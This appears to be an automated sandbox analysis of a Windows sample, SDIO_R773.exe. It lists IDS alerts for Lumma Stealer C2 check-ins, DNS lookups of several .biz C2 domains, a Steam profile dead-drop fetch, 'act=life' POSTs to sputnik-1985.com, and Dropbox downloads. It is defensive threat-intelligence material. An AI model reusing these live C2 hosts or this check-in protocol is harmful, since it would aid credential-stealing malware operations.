2025-01-11T11:56:28.731351+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:30.316746+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:31.630210+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49746 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:31.687606+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.4 | 49746 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:34.056316+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49747 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:34.507897+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49747 | 104.21.64.1 | 443 | TCP
2025-01-11T11:56:35.218542+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 162.125.66.18 | 443 | TCP
2025-01-11T11:56:36.746076+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49749 | 162.125.66.15 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.698622942 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.698687077 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815361977 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815478086 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815556049 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815562963 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815588951 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815630913 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815675974 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815860033 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815918922 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.816015005 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.816036940 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.816051960 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.816057920 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.833749056 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.833822012 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.833905935 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.834187031 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.834222078 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.296566963 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.296658993 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.300295115 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.300324917 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.300736904 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.302069902 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.302134037 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.302181005 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795391083 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795509100 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795548916 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795582056 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795591116 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795604944 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795701981 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795728922 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795746088 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795847893 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795875072 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795882940 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.796303034 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.796329975 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.796339035 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.798743010 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.800121069 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.800223112 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.800254107 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.800261974 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.800446987 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.881927967 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.881997108 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.882035017 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.882061958 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.882072926 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.882138968 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.882271051 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.882271051 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.884588003 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.884602070 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.362366915 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.362421036 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.362512112 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.362987995 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.363008976 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.845868111 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.845942020 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.847780943 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.847795010 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.848134041 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.849472046 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.849605083 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.849642038 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.849706888 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.849716902 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.039567947 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.039829016 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.039907932 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.039989948 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.040030003 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.115617990 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.115716934 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.115828991 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.116153002 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.116183996 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.599230051 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.599440098 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.600491047 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.600512028 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.600933075 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.608983040 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.609112978 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.609158993 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:35.223510027 CET49748443192.168.2.4162.125.66.18
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:35.267335892 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.066401958 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.066548109 CET49748443192.168.2.4162.125.66.18
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.066561937 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.066581964 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.066683054 CET49748443192.168.2.4162.125.66.18
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.068028927 CET49748443192.168.2.4162.125.66.18
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.068028927 CET49748443192.168.2.4162.125.66.18
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.068042994 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.068051100 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.092649937 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.092694998 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.094801903 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.095074892 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.095091105 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.745949984 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.746076107 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.746130943 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.746195078 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.747773886 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.747790098 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.748203993 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.749325037 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.791322947 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.054965973 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.107815981 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.107845068 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.108242035 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.108273029 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.108294964 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.108581066 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.108664036 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.108719110 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.830060005 CET4959653192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.840543985 CET53495961.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.845376015 CET5148953192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.854562044 CET53514891.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.856093884 CET6056853192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.865309000 CET53605681.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.866796970 CET5137453192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.876123905 CET53513741.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.879120111 CET6373353192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.888009071 CET53637331.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.890122890 CET6450453192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.898674965 CET53645041.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.902409077 CET6522353192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.911283970 CET53652231.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.913264036 CET5577253192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.922254086 CET53557721.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.924127102 CET5911853192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.931308985 CET53591181.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.211045980 CET5770653192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.223140001 CET53577061.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.527036905 CET5697553192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.533921003 CET53569751.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.069113016 CET6294453192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.091603041 CET53629441.1.1.1192.168.2.4
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Jan 11, 2025 11:56:10.830060005 CET | 192.168.2.4 | 1.1.1.1 | 0xedf3 | Standard query (0) | punishzement.biz | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.845376015 CET | 192.168.2.4 | 1.1.1.1 | 0xc11a | Standard query (0) | fraggielek.biz | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.856093884 CET | 192.168.2.4 | 1.1.1.1 | 0x9b19 | Standard query (0) | grandiouseziu.biz | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.866796970 CET | 192.168.2.4 | 1.1.1.1 | 0x151 | Standard query (0) | littlenotii.biz | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.879120111 CET | 192.168.2.4 | 1.1.1.1 | 0x8b63 | Standard query (0) | marketlumpe.biz | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.890122890 CET | 192.168.2.4 | 1.1.1.1 | 0xda5f | Standard query (0) | nuttyshopr.biz | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.902409077 CET | 192.168.2.4 | 1.1.1.1 | 0xd136 | Standard query (0) | spookycappy.biz | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.913264036 CET | 192.168.2.4 | 1.1.1.1 | 0xff9b | Standard query (0) | truculengisau.biz | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.924127102 CET | 192.168.2.4 | 1.1.1.1 | 0xf9b7 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:12.211045980 CET | 192.168.2.4 | 1.1.1.1 | 0x31ac | Standard query (0) | sputnik-1985.com | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:34.527036905 CET | 192.168.2.4 | 1.1.1.1 | 0xdcb8 | Standard query (0) | www.dropbox.com | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:36.069113016 CET | 192.168.2.4 | 1.1.1.1 | 0x1ef8 | Standard query (0) | uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Jan 11, 2025 11:56:10.840543985 CET | 1.1.1.1 | 192.168.2.4 | 0xedf3 | Name error (3) | punishzement.biz | none | none | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.854562044 CET | 1.1.1.1 | 192.168.2.4 | 0xc11a | Name error (3) | fraggielek.biz | none | none | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.865309000 CET | 1.1.1.1 | 192.168.2.4 | 0x9b19 | Name error (3) | grandiouseziu.biz | none | none | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.876123905 CET | 1.1.1.1 | 192.168.2.4 | 0x151 | Name error (3) | littlenotii.biz | none | none | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.888009071 CET | 1.1.1.1 | 192.168.2.4 | 0x8b63 | Name error (3) | marketlumpe.biz | none | none | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.898674965 CET | 1.1.1.1 | 192.168.2.4 | 0xda5f | Name error (3) | nuttyshopr.biz | none | none | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.911283970 CET | 1.1.1.1 | 192.168.2.4 | 0xd136 | Name error (3) | spookycappy.biz | none | none | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.922254086 CET | 1.1.1.1 | 192.168.2.4 | 0xff9b | Name error (3) | truculengisau.biz | none | none | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:10.931308985 CET | 1.1.1.1 | 192.168.2.4 | 0xf9b7 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:12.223140001 CET | 1.1.1.1 | 192.168.2.4 | 0x31ac | No error (0) | sputnik-1985.com | | 104.21.64.1 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:12.223140001 CET | 1.1.1.1 | 192.168.2.4 | 0x31ac | No error (0) | sputnik-1985.com | | 104.21.48.1 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:12.223140001 CET | 1.1.1.1 | 192.168.2.4 | 0x31ac | No error (0) | sputnik-1985.com | | 104.21.80.1 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:12.223140001 CET | 1.1.1.1 | 192.168.2.4 | 0x31ac | No error (0) | sputnik-1985.com | | 104.21.16.1 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:12.223140001 CET | 1.1.1.1 | 192.168.2.4 | 0x31ac | No error (0) | sputnik-1985.com | | 104.21.112.1 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:12.223140001 CET | 1.1.1.1 | 192.168.2.4 | 0x31ac | No error (0) | sputnik-1985.com | | 104.21.96.1 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:12.223140001 CET | 1.1.1.1 | 192.168.2.4 | 0x31ac | No error (0) | sputnik-1985.com | | 104.21.32.1 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:34.533921003 CET | 1.1.1.1 | 192.168.2.4 | 0xdcb8 | No error (0) | www.dropbox.com | www-env.dropbox-dns.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 11, 2025 11:56:34.533921003 CET | 1.1.1.1 | 192.168.2.4 | 0xdcb8 | No error (0) | www-env.dropbox-dns.com | | 162.125.66.18 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 11:56:36.091603041 CET | 1.1.1.1 | 192.168.2.4 | 0x1ef8 | No error (0) | uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com | edge-block-www-env.dropbox-dns.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 11, 2025 11:56:36.091603041 CET | 1.1.1.1 | 192.168.2.4 | 0x1ef8 | No error (0) | edge-block-www-env.dropbox-dns.com | | 162.125.66.15 | A (IP address) | IN (0x0001) | false |
                                                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                                                            • sputnik-1985.com
                                                                                                                                                                                                                                            • www.dropbox.com
                                                                                                                                                                                                                                            • uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 104.102.49.254 | 443 | 7528 | C:\Users\user\Desktop\SDIO_R773.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 10:56:11 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Host: steamcommunity.com
2025-01-11 10:56:12 UTC | 1905 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:12 GMT
                                                                                                                                                                                                                                            Content-Length: 35126
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: sessionid=698f4fb8a7022c28f9fbd017; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-11 10:56:12 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-11 10:56:12 UTC | 16384 | IN | Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
2025-01-11 10:56:12 UTC | 3768 | IN | Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
2025-01-11 10:56:12 UTC | 495 | IN | Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 104.21.64.1 | 443 | 7528 | C:\Users\user\Desktop\SDIO_R773.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 10:56:12 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Host: sputnik-1985.com
2025-01-11 10:56:12 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-11 10:56:12 UTC | 550 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:12 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tzbaan%2BbMZdyza9E272uibNSfg7z6UnnCwAGXLx0u7W4u5ZuO4Y5bIz4JqTcM3eNkZKRC12A0S83xHaYDRgPB6nAfihUeGTeFK08wuc3QVp6Kj8FuB4uPxotxq5PpGxf%2BK3a"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 900460ffcfa77c6a-EWR
